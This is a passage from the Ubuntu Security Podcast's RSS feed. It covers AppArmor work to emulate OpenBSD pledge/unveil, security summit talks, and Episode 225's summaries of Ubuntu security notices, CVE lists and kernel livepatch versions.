<ul>
<li>pledge is similar to seccomp() on linux - allows an application to
restrict what it can do by declaring what subsystems it should be allowed
access to &ldquo;promises&rdquo;
<ul>
<li>stdio, inet, bpf, unix, audio, video and many others</li>
<li>map these to equivalent AppArmor permissions (although this is not a perfect mapping but WIP)</li>
<li>also since this is at the LSM layer, we are not necessarily blocking
syscalls as is done by pledge (since it is more akin to seccomp)</li>
<li>but can use seccomp to plug any gaps</li>
<li>to fully emulate this also need to emulate the return value - since on
OpenBSD if the application violates the promise, deliver a SIGABRT -
whereas LSMs return EACCES</li>
<li>can do this via a new profile flag called <code>kill</code> along with the associated signal to deliver</li>
<li>further complications to this since not always SIGABRT, sometimes is an errno (ENOSYS/EACCES) too</li>
<li>extend apparmor policy to allow to specify priorities of what action should be taken in various cases</li>
<li>can use the aforementioned immutable profile flag and stacking to then implement the promise reduction feature of <code>pledge()</code></li>
</ul>
</li>
<li>unveil is used to remove visibility of parts of the file-system
<ul>
<li>maps quite cleanly to apparmor file rules</li>
</ul>
</li>
</ul>
</li>
<li>Full video of the session should be available soon</li>
</ul>
</li>
<li>Lots of other interesting talks:
<ul>
<li><a href="https://lssna24.sched.com/event/1aIe8/stacked-lsms-and-user-space-casey-schaufler-the-smack-project?iframe=yes&amp;w=100%25&amp;sidebar=yes&amp;bg=no">Stacked LSMs and User Space - Casey Schaufler, The Smack Project</a>
<ul>
<li>LSM syscalls and associated liblsm to provide an easier API plus emulation for older systems</li>
<li><a href="https://static.sched.com/hosted_files/lssna24/1a/2024-04-LSSNA-liblsm.pdf">https://static.sched.com/hosted_files/lssna24/1a/2024-04-LSSNA-liblsm.pdf</a></li>
</ul>
</li>
<li><a href="https://lssna24.sched.com/event/1aIe9/mitigating-integer-overflow-in-c-kees-cook-google?iframe=yes&amp;w=100%25&amp;sidebar=yes&amp;bg=no">Mitigating Integer Overflow in C - Kees Cook, Google</a>
<ul>
<li>LKSPP - latest efforts to mitigate integer overflows within the kernel
through the use of compiler sanitizers</li>
<li><a href="https://static.sched.com/hosted_files/lssna24/fb/Mitigating%20Integer%20Overflow%20in%20C.pdf">https://static.sched.com/hosted_files/lssna24/fb/Mitigating%20Integer%20Overflow%20in%20C.pdf</a></li>
</ul>
</li>
<li><a href="https://lssna24.sched.com/event/1aIeF/enhancing-kernel-bug-discovery-with-large-language-models-zahra-tarkhani-microsoft?iframe=yes&amp;w=100%25&amp;sidebar=yes&amp;bg=no">Enhancing Kernel Bug Discovery with Large Language Models - Zahra Tarkhani, Microsoft</a></li>
<li><a href="https://lssna24.sched.com/event/1aIeG/sandbox-mode-sbm-new-execution-mode-between-kernel-and-user-space-petr-tesarik-self-employed?iframe=yes&amp;w=100%25&amp;sidebar=yes&amp;bg=no">SandBox Mode (SBM) - New Execution Mode Between Kernel and User Space - Petr Tesarik, Self-employed</a></li>
</ul>
</li>
</ul>
<h3 id="upcoming-apparmor-security-update-for-cve-2016-1585">Upcoming AppArmor Security update for CVE-2016-1585</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/upcoming-apparmor-security-update-for-cve-2016-1585/44268/1">https://discourse.ubuntu.com/t/upcoming-apparmor-security-update-for-cve-2016-1585/44268/1</a></li>
<li><a href="https://bugs.launchpad.net/apparmor/+bug/1597017">https://bugs.launchpad.net/apparmor/+bug/1597017</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E226.mp3" length="24772081" type="audio/mpeg" /><itunes:duration>1439</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 225
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-225/</link>
          <pubDate>Fri, 12 Apr 2024 17:21:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>67195c686e5b9b18b4b5ee4bd467624681f3b8d68a065eea4e94f7be68725af5f3bc564a8ba0bc1c32227abb0a13c48d4fd43615b61fff572b2e72e9c45dcca2</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 225</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover the recent reports of a new local privilege escalation
  exploit against the Linux kernel, follow-up on the xz-utils backdoor from last
  week and it's the beta release of Ubuntu 24.04 LTS - plus we talk security...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we cover the recent reports of a new local privilege escalation
  exploit against the Linux kernel, follow-up on the xz-utils backdoor from last
  week and it's the beta release of Ubuntu 24.04 LTS - plus we talk security
  vulnerabilities in the X Server, Django, util-linux and more.
  </itunes:summary>
        <description>  This week we cover the recent reports of a new local privilege escalation
  exploit against the Linux kernel, follow-up on the xz-utils backdoor from last
  week and it's the beta release of Ubuntu 24.04 LTS - plus we talk security
  vulnerabilities in the X Server, Django, util-linux and more.
  </description>
        <googleplay:description>  This week we cover the recent reports of a new local privilege escalation
  exploit against the Linux kernel, follow-up on the xz-utils backdoor from last
  week and it's the beta release of Ubuntu 24.04 LTS - plus we talk security
  vulnerabilities in the X Server, Django, util-linux and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we cover the recent reports of a new local privilege escalation
exploit against the Linux kernel, follow-up on the xz-utils backdoor from last
week and it&rsquo;s the beta release of Ubuntu 24.04 LTS - plus we talk security
vulnerabilities in the X Server, Django, util-linux and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>76 unique CVEs addressed</p>
<h3 id="lsn-0102-1-linux-kernel-vulnerability--00-53">[<a href="https://ubuntu.com/security/notices/LSN-0102-1">LSN-0102-1</a>] Linux kernel vulnerability (00:53)</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0646">CVE-2024-0646</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6176">CVE-2023-6176</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4569">CVE-2023-4569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1872">CVE-2023-1872</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All covered in previous episodes
<ul>
<li>netfilter UAF (<a href="/episode-223/#usn-6700-1-linux-kernel-vulnerabilities--02-40">[USN-6700-1] Linux kernel vulnerabilities from Episode 223</a>)</li>
<li>OOB write in KTLS (<a href="/episode-220/#usn-6648-1-linux-kernel-vulnerabilities--02-00">[USN-6648-1] Linux kernel vulnerabilities from Episode 220</a>)</li>
<li>UAF in AppleTalk network driver (<a href="/episode-220/#usn-6648-1-linux-kernel-vulnerabilities--02-00">[USN-6648-1] Linux kernel vulnerabilities from Episode 220</a>)</li>
<li>NULL ptr deref in TLS impl (<a href="/episode-219/#lsn-0100-1-linux-kernel-vulnerability--00-56">[LSN-0100-1] Linux kernel vulnerability from Episode 219</a>)</li>
<li>Memory leak in netfilter (<a href="/episode-210/#usn-6383-1-linux-kernel-vulnerabilities--11-15">[USN-6383-1] Linux kernel vulnerabilities from Episode 210</a>)</li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-6.5</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-6.5</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-6.5</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>hwe-6.5</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>102.1</td>
          <td>102.1</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>canonical-livepatch status
</span></span></code></pre></div><h3 id="usn-6710-2-firefox-regressions--01-54">[<a href="https://ubuntu.com/security/notices/USN-6710-2">USN-6710-2</a>] Firefox regressions (01:54)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-29944">CVE-2024-29944</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-29943">CVE-2024-29943</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>124.0.2
<ul>
<li>In particular fixes to allow firefox when installed directly from Mozilla to
work under 24.04 LTS with the new AppArmor userns restrictions</li>
<li>As discussed in previous episodes, default profile allows to use userns but
then to be blocked on getting additional capabilities - Firefox would
previously try and do both a new userns and a new PID NS in one call - which
would be blocked - now split this into two separate calls so the userns can
succeed but pidns will be denied (since requires <code>CAP_SYS_ADMIN</code>) - but then
firefox correctly detects this and falls back to the correct behaviour</li>
</ul>
</li>
</ul>
<h3 id="usn-6721-1-x-dot-org-x-server-vulnerabilities--04-11">[<a href="https://ubuntu.com/security/notices/USN-6721-1">USN-6721-1</a>] X.Org X Server vulnerabilities (04:11)</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-31083">CVE-2024-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31082">CVE-2024-31082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31081">CVE-2024-31081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31080">CVE-2024-31080</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various OOB reads -&gt; crash / info leaks when handling byte-swapped length
values - able to be easily triggered by a client who is using a different
endianness than the X server</li>
<li>UAF in glyph handling -&gt; crash / RCE</li>
</ul>
<h3 id="usn-6721-2-x-dot-org-x-server-regression">[<a href="https://ubuntu.com/security/notices/USN-6721-2">USN-6721-2</a>] X.Org X Server regression</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-31083">CVE-2024-31083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31082">CVE-2024-31082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31081">CVE-2024-31081</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31080">CVE-2024-31080</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6722-1-django-vulnerability--05-19">[<a href="https://ubuntu.com/security/notices/USN-6722-1">USN-6722-1</a>] Django vulnerability (05:19)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19844">CVE-2019-19844</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible account takeover - would use a case transformation on unicode of the
email address - so if an attacker can register an email address that is the
same as the intended targets email address after this case transformation -
fix simply just discards the transformed email address and sends to the one
registered by the user</li>
</ul>
<h3 id="usn-6723-1-bind-vulnerabilities--06-11">[<a href="https://ubuntu.com/security/notices/USN-6723-1">USN-6723-1</a>] Bind vulnerabilities (06:11)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-50868">CVE-2023-50868</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50387">CVE-2023-50387</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-219/#usn-6633-1-bind-vulnerabilities--07-33">[USN-6633-1] Bind vulnerabilities from Episode 219</a></li>
</ul>
<h3 id="usn-6724-1-linux-kernel-vulnerabilities--06-27">[<a href="https://ubuntu.com/security/notices/USN-6724-1">USN-6724-1</a>] Linux kernel vulnerabilities (06:27)</h3>
<ul>
<li>12 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52434">CVE-2023-52434</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23850">CVE-2024-23850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22705">CVE-2024-22705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6610">CVE-2023-6610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-50431">CVE-2023-50431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6725-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6725-1">USN-6725-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>46 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52610">CVE-2023-52610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52441">CVE-2023-52441</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52467">CVE-2023-52467</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26591">CVE-2024-26591</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52458">CVE-2023-52458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26589">CVE-2024-26589</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26586">CVE-2024-26586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26598">CVE-2024-26598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26631">CVE-2024-26631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52442">CVE-2023-52442</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52480">CVE-2023-52480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52456">CVE-2023-52456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52462">CVE-2023-52462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52463">CVE-2023-52463</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-24860">CVE-2024-24860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23850">CVE-2024-23850</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-22705">CVE-2024-22705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52340">CVE-2023-52340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3867">CVE-2023-3867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38431">CVE-2023-38431</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38430">CVE-2023-38430</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38427">CVE-2023-38427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32258">CVE-2023-32258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32254">CVE-2023-32254</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1194">CVE-2023-1194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6726-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6726-1">USN-6726-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>23 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52438">CVE-2023-52438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52436">CVE-2023-52436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52454">CVE-2023-52454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52470">CVE-2023-52470</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52451">CVE-2023-52451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52445">CVE-2023-52445</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52469">CVE-2023-52469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52609">CVE-2023-52609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52444">CVE-2023-52444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52449">CVE-2023-52449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26597">CVE-2024-26597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26633">CVE-2024-26633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52612">CVE-2023-52612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52443">CVE-2023-52443</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52457">CVE-2023-52457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52448">CVE-2023-52448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52464">CVE-2023-52464</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0607">CVE-2024-0607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23851">CVE-2024-23851</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52429">CVE-2023-52429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52340">CVE-2023-52340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6701-4-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6701-4">USN-6701-4</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-24855">CVE-2024-24855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1086">CVE-2024-1086</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0775">CVE-2024-0775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6121">CVE-2023-6121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-51781">CVE-2023-51781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46838">CVE-2023-46838</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4132">CVE-2023-4132</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39197">CVE-2023-39197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34256">CVE-2023-34256</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3006">CVE-2023-3006</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23000">CVE-2023-23000</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6719-2-util-linux-vulnerability--07-08">[<a href="https://ubuntu.com/security/notices/USN-6719-2">USN-6719-2</a>] util-linux vulnerability (07:08)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-28085">CVE-2024-28085</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Initial fix in <a href="/episode-224/#usn-6719-1-util-linux-vulnerability">[USN-6719-1] util-linux vulnerability from Episode 224</a> tried to
escape output to avoid shell command injection - as is often the case, turned
out to be insufficient, so instead have now just removed the setgid permission
from the wall/write binaries - can then only send to yourself rather than all
users</li>
</ul>
